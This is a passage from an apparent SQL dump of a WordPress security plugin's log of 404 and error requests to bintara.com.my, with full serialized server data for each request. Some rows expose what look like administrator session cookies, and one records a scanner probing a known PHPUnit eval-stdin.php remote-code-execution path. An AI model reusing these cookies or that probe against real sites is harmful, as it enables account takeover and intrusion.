wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Ceb19a3fe82fc8ce4d135151b0fa401c08e97aa9bf901e8cdeaea7983f994015d; wp-saving-post=1-saved; wp-settings-time-1=1569289910; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:90:\"https://bintara.com.my/wp-admin/edit.php?post_type=page&ip-geo-block-auth-nonce=81f718a471\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"9\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"195-9\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYl4FalcngZvooN2hHYdBQAAAAk\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYl4FalcngZvooN2hHYdBQAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"55497\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYl4FalcngZvooN2hHYdBQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569290261.5991\";s:12:\"REQUEST_TIME\";s:10:\"1569290261\";}}','notice','2019-09-24 01:57:43','2019-09-24 01:57:42',31538696,31800520,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'175.142.115.214'),(26891,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.5155.400 QQBrowser/9.7.13231.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYltOqlcngZvooN2hHYV7QAAAM0\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"63745\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYltOqlcngZvooN2hHYV7QAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569287482.3894\";s:12:\"REQUEST_TIME\";s:10:\"1569287482\";}}','notice','2019-09-24 01:11:25','2019-09-24 01:11:22',30760224,32569984,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26890,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"7\";s:13:\"H2_STREAM_TAG\";s:5:\"344-7\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:774:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569226408; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Ceb19a3fe82fc8ce4d135151b0fa401c08e97aa9bf901e8cdeaea7983f994015d; wp-saving-post=1287-saved\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"344-7\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"344-7\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYloikxABsgUhwCb1f0CLgAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:19:\"REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYloikxABsgUhwCb1f0CLgAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"54555\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:10:\"SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYloikxABsgUhwCb1f0CLgAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569286283.0427\";s:12:\"REQUEST_TIME\";s:10:\"1569286283\";}}','notice','2019-09-24 00:51:24','2019-09-24 00:51:23',31640120,31902800,'https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map',1,1,'175.142.115.214'),(26889,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/?page_id=18%2Fcontact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:24:\"page_id=18%2Fcontact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"59810\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlltJUzoIxaOBG59KNCjwAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569285556.902\";s:12:\"REQUEST_TIME\";s:10:\"1569285556\";}}','notice','2019-09-24 00:39:19','2019-09-24 00:39:17',30812728,32626040,'https://bintara.com.my/?page_id=18%2Fcontact.php',1,0,'136.243.199.108'),(26888,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:91:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:77:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:86:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:91:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:91:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:92:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:87:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:90:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:83:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:78:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:81:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"47.89.208.37\";s:11:\"REMOTE_PORT\";s:5:\"58828\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:79:\"https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:10:\"SCRIPT_URL\";s:57:\"/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlkdbrKAG8MsefIeiScKwAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569285238.0961\";s:12:\"REQUEST_TIME\";s:10:\"1569285238\";}}','notice','2019-09-24 00:33:59','2019-09-24 